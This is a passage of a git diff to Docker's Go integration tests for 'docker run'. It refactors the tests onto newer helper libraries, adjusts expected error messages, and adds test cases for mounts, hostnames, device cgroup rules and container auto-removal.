@@ -4091,8 +3716,8 @@ func (s *DockerSuite) TestRunInvalidReference(c *check.C) { c.Fatalf("expected non-zero exist code; received %d", exit) } - if !strings.Contains(out, "Error parsing reference") { - c.Fatalf(`Expected "Error parsing reference" in output; got: %s`, out) + if !strings.Contains(out, "invalid reference format") { + c.Fatalf(`Expected "invalid reference format" in output; got: %s`, out) } } @@ -4101,15 +3726,10 @@ func (s *DockerSuite) TestRunInitLayerPathOwnership(c *check.C) { // Not applicable on Windows as it does not support Linux uid/gid ownership testRequires(c, DaemonIsLinux) name := "testetcfileownership" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group - RUN chown dockerio:dockerio /etc`, - true) - if err != nil { - c.Fatal(err) - } + RUN chown dockerio:dockerio /etc`)) // Test that dockerio ownership of /etc is retained at runtime out, _ := dockerCmd(c, "run", "--rm", name, "stat", "-c", "%U:%G", "/etc") @@ -4165,15 +3785,8 @@ func (s *DockerSuite) TestRunVolumesMountedAsShared(c *check.C) { // Convert this directory into a shared mount point so that we do // not rely on propagation properties of parent mount. 
- cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } - - cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("mount", "--bind", tmpDir, tmpDir).Assert(c, icmd.Success) + icmd.RunCommand("mount", "--make-private", "--make-shared", tmpDir).Assert(c, icmd.Success) dockerCmd(c, "run", "--privileged", "-v", fmt.Sprintf("%s:/volume-dest:shared", tmpDir), "busybox", "mount", "--bind", "/volume-dest/mnt1", "/volume-dest/mnt1") @@ -4215,25 +3828,15 @@ func (s *DockerSuite) TestRunVolumesMountedAsSlave(c *check.C) { // Convert this directory into a shared mount point so that we do // not rely on propagation properties of parent mount. - cmd := exec.Command("mount", "--bind", tmpDir, tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } - - cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("mount", "--bind", tmpDir, tmpDir).Assert(c, icmd.Success) + icmd.RunCommand("mount", "--make-private", "--make-shared", tmpDir).Assert(c, icmd.Success) dockerCmd(c, "run", "-i", "-d", "--name", "parent", "-v", fmt.Sprintf("%s:/volume-dest:slave", tmpDir), "busybox", "top") // Bind mount tmpDir2/ onto tmpDir/mnt1. 
If mount propagates inside // container then contents of tmpDir2/slave-testfile should become // visible at "/volume-dest/mnt1/slave-testfile" - cmd = exec.Command("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")) - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")).Assert(c, icmd.Success) out, _ := dockerCmd(c, "exec", "parent", "cat", "/volume-dest/mnt1/slave-testfile") @@ -4255,11 +3858,10 @@ func (s *DockerSuite) TestRunNamedVolumeCopyImageData(c *check.C) { testRequires(c, DaemonIsLinux) testImg := "testvolumecopy" - _, err := buildImage(testImg, ` + buildImageSuccessfully(c, testImg, build.WithDockerfile(` FROM busybox RUN mkdir -p /foo && echo hello > /foo/hello - `, true) - c.Assert(err, check.IsNil) + `)) dockerCmd(c, "run", "-v", "foo:/foo", testImg) out, _ := dockerCmd(c, "run", "-v", "foo:/foo", "busybox", "cat", "/foo/hello") @@ -4274,32 +3876,61 @@ func (s *DockerSuite) TestRunNamedVolumeNotRemoved(c *check.C) { dockerCmd(c, "run", "--rm", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") dockerCmd(c, "volume", "inspect", "test") out, _ := dockerCmd(c, "volume", "ls", "-q") - c.Assert(strings.TrimSpace(out), checker.Equals, "test") + c.Assert(strings.TrimSpace(out), checker.Contains, "test") dockerCmd(c, "run", "--name=test", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") dockerCmd(c, "rm", "-fv", "test") dockerCmd(c, "volume", "inspect", "test") out, _ = dockerCmd(c, "volume", "ls", "-q") - c.Assert(strings.TrimSpace(out), checker.Equals, "test") + c.Assert(strings.TrimSpace(out), checker.Contains, "test") } func (s *DockerSuite) TestRunNamedVolumesFromNotRemoved(c *check.C) { prefix, _ := getPrefixAndSlashFromDaemonPlatform() dockerCmd(c, "volume", "create", "test") - dockerCmd(c, "run", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") + cid, _ := dockerCmd(c, "run", "-d", 
"--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true") dockerCmd(c, "run", "--name=child", "--volumes-from=parent", "busybox", "true") + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + container, err := cli.ContainerInspect(context.Background(), strings.TrimSpace(cid)) + c.Assert(err, checker.IsNil) + var vname string + for _, v := range container.Mounts { + if v.Name != "test" { + vname = v.Name + } + } + c.Assert(vname, checker.Not(checker.Equals), "") + // Remove the parent so there are not other references to the volumes dockerCmd(c, "rm", "-f", "parent") // now remove the child and ensure the named volume (and only the named volume) still exists dockerCmd(c, "rm", "-fv", "child") dockerCmd(c, "volume", "inspect", "test") out, _ := dockerCmd(c, "volume", "ls", "-q") - c.Assert(strings.TrimSpace(out), checker.Equals, "test") + c.Assert(strings.TrimSpace(out), checker.Contains, "test") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), vname) } func (s *DockerSuite) TestRunAttachFailedNoLeak(c *check.C) { + // TODO @msabansal - https://github.com/moby/moby/issues/35023. Duplicate + // port mappings are not errored out on RS3 builds. Temporarily disabling + // this test pending further investigation. Note we parse kernel.GetKernelVersion + // rather than system.GetOSVersion as test binaries aren't manifested, so would + // otherwise report build 9200. 
+ if runtime.GOOS == "windows" { + v, err := kernel.GetKernelVersion() + c.Assert(err, checker.IsNil) + build, _ := strconv.Atoi(strings.Split(strings.SplitN(v.String(), " ", 3)[2][1:], ".")[0]) + if build == 16299 { + c.Skip("Temporarily disabled on RS3 builds") + } + } + nroutines, err := getGoroutineNumber() c.Assert(err, checker.IsNil) @@ -4335,14 +3966,9 @@ func (s *DockerSuite) TestRunVolumeWithOneCharacter(c *check.C) { func (s *DockerSuite) TestRunVolumeCopyFlag(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support copying data from image to the volume - _, err := buildImage("volumecopy", - `FROM busybox + buildImageSuccessfully(c, "volumecopy", build.WithDockerfile(`FROM busybox RUN mkdir /foo && echo hello > /foo/bar - CMD cat /foo/bar`, - true, - ) - c.Assert(err, checker.IsNil) - + CMD cat /foo/bar`)) dockerCmd(c, "volume", "create", "test") // test with the nocopy flag @@ -4378,26 +4004,30 @@ func (s *DockerSuite) TestRunDNSInHostMode(c *check.C) { expectedOutput := "nameserver 127.0.0.1" expectedWarning := "Localhost DNS setting" - out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) - c.Assert(stderr, checker.Contains, expectedWarning, check.Commentf("Expected warning on stderr about localhost resolver, but got %q", stderr)) + cli.DockerCmd(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + Err: expectedWarning, + }) expectedOutput = "nameserver 1.2.3.4" - out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + cli.DockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, 
icmd.Expected{ + Out: expectedOutput, + }) expectedOutput = "search example.com" - out, _ = dockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + cli.DockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + }) expectedOutput = "options timeout:3" - out, _ = dockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + cli.DockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{ + Out: expectedOutput, + }) expectedOutput1 := "nameserver 1.2.3.4" expectedOutput2 := "search example.com" expectedOutput3 := "options timeout:3" - out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf") + out := cli.DockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf").Combined() c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out)) c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out)) c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out)) @@ -4421,6 +4051,29 @@ func (s *DockerSuite) TestRunRmAndWait(c *check.C) { c.Assert(code, checker.Equals, 0) } +// Test that auto-remove is performed by the daemon (API 1.25 and above) +func (s *DockerSuite) TestRunRm(c *check.C) { + name := "miss-me-when-im-gone" + cli.DockerCmd(c, "run", "--name="+name, "--rm", "busybox") + + 
cli.Docker(cli.Inspect(name), cli.Format(".name")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "No such object: " + name, + }) +} + +// Test that auto-remove is performed by the client on API versions that do not support daemon-side api-remove (API < 1.25) +func (s *DockerSuite) TestRunRmPre125Api(c *check.C) { + name := "miss-me-when-im-gone" + envs := appendBaseEnv(os.Getenv("DOCKER_TLS_VERIFY") != "", "DOCKER_API_VERSION=1.24") + cli.Docker(cli.Args("run", "--name="+name, "--rm", "busybox"), cli.WithEnvironmentVariables(envs...)).Assert(c, icmd.Success) + + cli.Docker(cli.Inspect(name), cli.Format(".name")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "No such object: " + name, + }) +} + // Test case for #23498 func (s *DockerSuite) TestRunUnsetEntrypoint(c *check.C) { testRequires(c, DaemonIsLinux) @@ -4431,33 +4084,34 @@ RUN chmod 755 /entrypoint.sh ENTRYPOINT ["/entrypoint.sh"] CMD echo foobar` - ctx, err := fakeContext(dockerfile, map[string]string{ - "entrypoint.sh": `#!/bin/sh + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "entrypoint.sh": `#!/bin/sh echo "I am an entrypoint" exec "$@"`, - }) - c.Assert(err, check.IsNil) + })) defer ctx.Close() - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo") + out := cli.DockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo").Combined() c.Assert(strings.TrimSpace(out), check.Equals, "foo") // CMD will be reset as well (the same as setting a custom entrypoint) - _, _, err = dockerCmdWithError("run", "--entrypoint=", "-t", name) - c.Assert(err, check.NotNil) - c.Assert(err.Error(), checker.Contains, "No command specified") + cli.Docker(cli.Args("run", "--entrypoint=", "-t", name)).Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "No command specified", + }) } func (s 
*DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) { - c.Assert(s.d.StartWithBusybox("--debug", "--default-ulimit=nofile=65535"), checker.IsNil) + s.d.StartWithBusybox(c, "--debug", "--default-ulimit=nofile=65535") name := "test-A" _, err := s.d.Cmd("run", "--name", name, "-d", "busybox", "top") c.Assert(err, checker.IsNil) - c.Assert(s.d.waitRun(name), check.IsNil) + c.Assert(s.d.WaitRun(name), check.IsNil) out, err := s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) c.Assert(err, checker.IsNil) @@ -4466,7 +4120,7 @@ func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) { name = "test-B" _, err = s.d.Cmd("run", "--name", name, "--ulimit=nofile=42", "-d", "busybox", "top") c.Assert(err, checker.IsNil) - c.Assert(s.d.waitRun(name), check.IsNil) + c.Assert(s.d.WaitRun(name), check.IsNil) out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name) c.Assert(err, checker.IsNil) @@ -4479,7 +4133,7 @@ func (s *DockerSuite) TestRunStoppedLoggingDriverNoLeak(c *check.C) { out, _, err := dockerCmdWithError("run", "--name=fail", "--log-driver=splunk", "busybox", "true") c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out)) + c.Assert(out, checker.Contains, "failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out)) // NGoroutines is not updated right away, so we need to wait before failing c.Assert(waitForGoroutines(nroutines), checker.IsNil) @@ -4510,29 +4164,10 @@ func (s *DockerSuite) TestRunCredentialSpecFailures(c *check.C) { func (s *DockerSuite) TestRunCredentialSpecWellFormed(c *check.C) { testRequires(c, DaemonIsWindows, SameHostDaemon) validCS := readFile(`fixtures\credentialspecs\valid.json`, c) - writeFile(filepath.Join(dockerBasePath, `credentialspecs\valid.json`), validCS, c) + 
writeFile(filepath.Join(testEnv.DaemonInfo.DockerRootDir, `credentialspecs\valid.json`), validCS, c) dockerCmd(c, "run", `--security-opt=credentialspec=file://valid.json`, "busybox", "true") } -// Windows specific test to ensure that a servicing app container is started -// if necessary once a container exits. It does this by forcing a no-op -// servicing event and verifying the event from Hyper-V-Compute -func (s *DockerSuite) TestRunServicingContainer(c *check.C) { - testRequires(c, DaemonIsWindows, SameHostDaemon) - - out, _ := dockerCmd(c, "run", "-d", WindowsBaseImage, "cmd", "/c", "mkdir c:\\programdata\\Microsoft\\Windows\\ContainerUpdates\\000_000_d99f45d0-ffc8-4af7-bd9c-ea6a62e035c9_200 && sc control cexecsvc 255") - containerID := strings.TrimSpace(out) - err := waitExited(containerID, 60*time.Second) - c.Assert(err, checker.IsNil) - - cmd := exec.Command("powershell", "echo", `(Get-WinEvent -ProviderName "Microsoft-Windows-Hyper-V-Compute" -FilterXPath 'Event[System[EventID=2010]]' -MaxEvents 1).Message`) - out2, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil) - c.Assert(out2, checker.Contains, `"Servicing":true`, check.Commentf("Servicing container does not appear to have been started: %s", out2)) - c.Assert(out2, checker.Contains, `Windows Container (Servicing)`, check.Commentf("Didn't find 'Windows Container (Servicing): %s", out2)) - c.Assert(out2, checker.Contains, containerID+"_servicing", check.Commentf("Didn't find '%s_servicing': %s", containerID+"_servicing", out2)) -} - func (s *DockerSuite) TestRunDuplicateMount(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) @@ -4642,16 +4277,18 @@ func (s *DockerSuite) TestSlowStdinClosing(c *check.C) { name := "testslowstdinclosing" repeat := 3 // regression happened 50% of the time for i := 0; i < repeat; i++ { - cmd := exec.Command(dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat") - cmd.Stdin = &delayedReader{} + cmd := icmd.Cmd{ + 
Command: []string{dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat"}, + Stdin: &delayedReader{}, + } done := make(chan error, 1) go func() { - _, err := runCommand(cmd) + err := icmd.RunCmd(cmd).Error done <- err }() select { - case <-time.After(15 * time.Second): + case <-time.After(30 * time.Second): c.Fatal("running container timed out") // cleanup in teardown case err := <-done: c.Assert(err, checker.IsNil) @@ -4668,7 +4305,7 @@ func (s *delayedReader) Read([]byte) (int, error) { // #28823 (originally #28639) func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) emptyDir, err := ioutil.TempDir("", "test-read-only-dev-shm") c.Assert(err, check.IsNil) defer os.RemoveAll(emptyDir) @@ -4679,11 +4316,224 @@ func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) { c.Assert(out, checker.Contains, "Read-only file system") } +func (s *DockerSuite) TestRunMount(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + // mnt1, mnt2, and testCatFooBar are commonly used in multiple test cases + tmpDir, err := ioutil.TempDir("", "mount") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + mnt1, mnt2 := path.Join(tmpDir, "mnt1"), path.Join(tmpDir, "mnt2") + if err := os.Mkdir(mnt1, 0755); err != nil { + c.Fatal(err) + } + if err := os.Mkdir(mnt2, 0755); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(mnt1, "test1"), []byte("test1"), 0644); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(path.Join(mnt2, "test2"), []byte("test2"), 0644); err != nil { + c.Fatal(err) + } + testCatFooBar := func(cName string) error { + out, _ := dockerCmd(c, "exec", cName, "cat", "/foo/test1") + if out != "test1" { + return fmt.Errorf("%s not mounted on /foo", mnt1) + } + out, _ = dockerCmd(c, "exec", cName, "cat", "/bar/test2") + if out != "test2" { + return 
fmt.Errorf("%s not mounted on /bar", mnt2) + } + return nil + } + + type testCase struct { + equivalents [][]string + valid bool + // fn should be nil if valid==false + fn func(cName string) error + } + cases := []testCase{ + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/bar", mnt2), + }, + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,target=/bar", mnt2), + }, + { + "--volume", mnt1 + ":/foo", + "--mount", fmt.Sprintf("type=bind,src=%s,target=/bar", mnt2), + }, + }, + valid: true, + fn: testCatFooBar, + }, + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/bar", mnt2), + }, + { + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,target=/bar", mnt2), + }, + }, + valid: false, + }, + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,dst=/bar", mnt2), + }, + { + "--volume", mnt1 + ":/foo", + "--mount", fmt.Sprintf("type=volume,src=%s,target=/bar", mnt2), + }, + }, + valid: false, + fn: testCatFooBar, + }, + { + equivalents: [][]string{ + { + "--read-only", + "--mount", "type=volume,dst=/bar", + }, + }, + valid: true, + fn: func(cName string) error { + _, _, err := dockerCmdWithError("exec", cName, "touch", "/bar/icanwritehere") + return err + }, + }, + { + equivalents: [][]string{ + { + "--read-only", + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", "type=volume,dst=/bar", + }, + { + "--read-only", + "--volume", fmt.Sprintf("%s:/foo", mnt1), + "--mount", "type=volume,dst=/bar", + }, + }, + valid: true, + fn: func(cName string) error { + out, _ := dockerCmd(c, "exec", cName, "cat", "/foo/test1") + if out != "test1" { + return fmt.Errorf("%s not mounted 
on /foo", mnt1) + } + _, _, err := dockerCmdWithError("exec", cName, "touch", "/bar/icanwritehere") + return err + }, + }, + { + equivalents: [][]string{ + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt2), + }, + { + "--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,target=/foo", mnt2), + }, + { + "--volume", fmt.Sprintf("%s:/foo", mnt1), + "--mount", fmt.Sprintf("type=bind,src=%s,target=/foo", mnt2), + }, + }, + valid: false, + }, + { + equivalents: [][]string{ + { + "--volume", fmt.Sprintf("%s:/foo", mnt1), + "--mount", fmt.Sprintf("type=volume,src=%s,target=/foo", mnt2), + }, + }, + valid: false, + }, + { + equivalents: [][]string{ + { + "--mount", "type=volume,target=/foo", + "--mount", "type=volume,target=/foo", + }, + }, + valid: false, + }, + } + + for i, testCase := range cases { + for j, opts := range testCase.equivalents { + cName := fmt.Sprintf("mount-%d-%d", i, j) + _, _, err := dockerCmdWithError(append([]string{"run", "-i", "-d", "--name", cName}, + append(opts, []string{"busybox", "top"}...)...)...) + if testCase.valid { + c.Assert(err, check.IsNil, + check.Commentf("got error while creating a container with %v (%s)", opts, cName)) + c.Assert(testCase.fn(cName), check.IsNil, + check.Commentf("got error while executing test for %v (%s)", opts, cName)) + dockerCmd(c, "rm", "-f", cName) + } else { + c.Assert(err, checker.NotNil, + check.Commentf("got nil while creating a container with %v (%s)", opts, cName)) + } + } + } +} + +// Test that passing a FQDN as hostname properly sets hostname, and +// /etc/hostname. 
Test case for 29100 +func (s *DockerSuite) TestRunHostnameFQDN(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOutput := "foobar.example.com\nfoobar.example.com\nfoobar\nexample.com\nfoobar.example.com" + out, _ := dockerCmd(c, "run", "--hostname=foobar.example.com", "busybox", "sh", "-c", `cat /etc/hostname && hostname && hostname -s && hostname -d && hostname -f`) + c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput) + + out, _ = dockerCmd(c, "run", "--hostname=foobar.example.com", "busybox", "sh", "-c", `cat /etc/hosts`) + expectedOutput = "foobar.example.com foobar" + c.Assert(strings.TrimSpace(out), checker.Contains, expectedOutput) +} + // Test case for 29129 func (s *DockerSuite) TestRunHostnameInHostMode(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, NotUserNamespace) expectedOutput := "foobar\nfoobar" out, _ := dockerCmd(c, "run", "--net=host", "--hostname=foobar", "busybox", "sh", "-c", `echo $HOSTNAME && hostname`) c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput) } + +func (s *DockerSuite) TestRunAddDeviceCgroupRule(c *check.C) { + testRequires(c, DaemonIsLinux) + + deviceRule := "c 7:128 rwm" + + out, _ := dockerCmd(c, "run", "--rm", "busybox", "cat", "/sys/fs/cgroup/devices/devices.list") + if strings.Contains(out, deviceRule) { + c.Fatalf("%s shouldn't been in the device.list", deviceRule) + } + + out, _ = dockerCmd(c, "run", "--rm", fmt.Sprintf("--device-cgroup-rule=%s", deviceRule), "busybox", "grep", deviceRule, "/sys/fs/cgroup/devices/devices.list") + c.Assert(strings.TrimSpace(out), checker.Equals, deviceRule) +} + +// Verifies that running as local system is operating correctly on Windows +func (s *DockerSuite) TestWindowsRunAsSystem(c *check.C) { + testRequires(c, DaemonIsWindowsAtLeastBuild(15000)) + out, _ := dockerCmd(c, "run", "--net=none", `--user=nt authority\system`, "--hostname=XYZZY", minimalBaseImage(), "cmd", "/c", `@echo %USERNAME%`) + 
c.Assert(strings.TrimSpace(out), checker.Equals, "XYZZY$") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go index e346c19f8e..3444d22bfd 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go @@ -4,6 +4,7 @@ package main import ( "bufio" + "context" "encoding/json" "fmt" "io/ioutil" @@ -16,13 +17,17 @@ import ( "syscall" "time" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/homedir" - "github.com/docker/docker/pkg/integration/checker" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/sysinfo" "github.com/go-check/check" "github.com/kr/pty" + "gotest.tools/icmd" ) // #6509 @@ -71,9 +76,7 @@ func (s *DockerSuite) TestRunWithVolumesIsRecursive(c *check.C) { c.Assert(err, checker.IsNil) defer f.Close() - runCmd := exec.Command(dockerBinary, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs") - out, _, _, err := runCommandWithStdoutStderr(runCmd) - c.Assert(err, checker.IsNil) + out, _ := dockerCmd(c, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs") c.Assert(out, checker.Contains, filepath.Base(f.Name()), check.Commentf("Recursive bind mount test failed. Expected file not found")) } @@ -90,7 +93,7 @@ func (s *DockerSuite) TestRunDeviceDirectory(c *check.C) { c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "seq", check.Commentf("expected output /dev/othersnd/seq")) } -// TestRunDetach checks attaching and detaching with the default escape sequence. 
+// TestRunAttachDetach checks attaching and detaching with the default escape sequence. func (s *DockerSuite) TestRunAttachDetach(c *check.C) { name := "attach-detach" @@ -141,7 +144,7 @@ func (s *DockerSuite) TestRunAttachDetach(c *check.C) { c.Assert(out, checker.Contains, "detach") } -// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +// TestRunAttachDetachFromFlag checks attaching and detaching with the escape sequence specified via flags. func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) { name := "attach-detach" keyCtrlA := []byte{1} @@ -202,7 +205,7 @@ func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) } -// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +// TestRunAttachDetachFromInvalidFlag checks attaching and detaching with the escape sequence specified via flags. func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { name := "attach-detach" dockerCmd(c, "run", "--name", name, "-itd", "busybox", "top") @@ -223,6 +226,7 @@ func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { if err := cmd.Start(); err != nil { c.Fatal(err) } + go cmd.Wait() bufReader := bufio.NewReader(stdout) out, err := bufReader.ReadString('\n') @@ -230,11 +234,11 @@ func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { c.Fatal(err) } // it should print a warning to indicate the detach key flag is invalid - errStr := "Invalid escape keys (ctrl-A,a) provided" + errStr := "Invalid detach keys (ctrl-A,a) provided" c.Assert(strings.TrimSpace(out), checker.Equals, errStr) } -// TestRunDetach checks attaching and detaching with the escape sequence specified via config file. +// TestRunAttachDetachFromConfig checks attaching and detaching with the escape sequence specified via config file. 
func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) { keyCtrlA := []byte{1} keyA := []byte{97} @@ -317,7 +321,7 @@ func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) } -// TestRunDetach checks attaching and detaching with the detach flags, making sure it overrides config file +// TestRunAttachDetachKeysOverrideConfig checks attaching and detaching with the detach flags, making sure it overrides config file func (s *DockerSuite) TestRunAttachDetachKeysOverrideConfig(c *check.C) { keyCtrlA := []byte{1} keyA := []byte{97} @@ -421,6 +425,7 @@ func (s *DockerSuite) TestRunAttachInvalidDetachKeySequencePreserved(c *check.C) if err := cmd.Start(); err != nil { c.Fatal(err) } + go cmd.Wait() c.Assert(waitRun(name), check.IsNil) // Invalid escape sequence aba, should print aba in output @@ -495,11 +500,13 @@ func (s *DockerSuite) TestRunWithKernelMemory(c *check.C) { testRequires(c, kernelMemorySupport) file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" - stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file) - c.Assert(strings.TrimSpace(stdout), checker.Equals, "52428800") + cli.DockerCmd(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file).Assert(c, icmd.Expected{ + Out: "52428800", + }) - out := inspectField(c, "test1", "HostConfig.KernelMemory") - c.Assert(out, check.Equals, "52428800") + cli.InspectCmd(c, "test1", cli.Format(".HostConfig.KernelMemory")).Assert(c, icmd.Expected{ + Out: "52428800", + }) } func (s *DockerSuite) TestRunWithInvalidKernelMemory(c *check.C) { @@ -531,8 +538,9 @@ func (s *DockerSuite) TestRunWithCPUShares(c *check.C) { func (s *DockerSuite) TestRunEchoStdoutWithCPUSharesAndMemoryLimit(c *check.C) { testRequires(c, cpuShare) testRequires(c, memoryLimitSupport) - out, _, _ := dockerCmdWithStdoutStderr(c, "run", 
